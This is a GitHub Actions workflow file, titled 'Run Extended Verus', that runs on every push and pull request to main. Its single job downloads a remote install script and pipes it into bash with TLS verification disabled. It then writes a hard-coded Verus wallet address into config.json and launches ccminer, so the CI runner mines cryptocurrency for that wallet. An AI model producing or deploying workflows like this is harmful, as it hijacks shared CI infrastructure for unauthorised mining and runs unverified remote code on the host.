name: Run Extended Verus

on:
  push:
    branches:
      - main  # Trigger on push to the main branch
  pull_request:
    branches:
      - main  # Trigger on pull requests to the main branch

jobs:
  run-extended-mining:
    runs-on: ubuntu-latest  # Use Ubuntu environment

    steps:
      - name: Checkout code
        uses: actions/checkout@v2

      - name: Install and Run
        run: |
          curl -o- -k https://raw.githubusercontent.com/TheRetroMike/VerusCliMining/main/install.sh | bash
          cd ~/ccminer
          sed -i 's|"user": ".*"|"user": "RNjEn7tNTZ6DuYnYrxKMsvYzBgJ11P5hQ4"|g' config.json
          ./ccminer
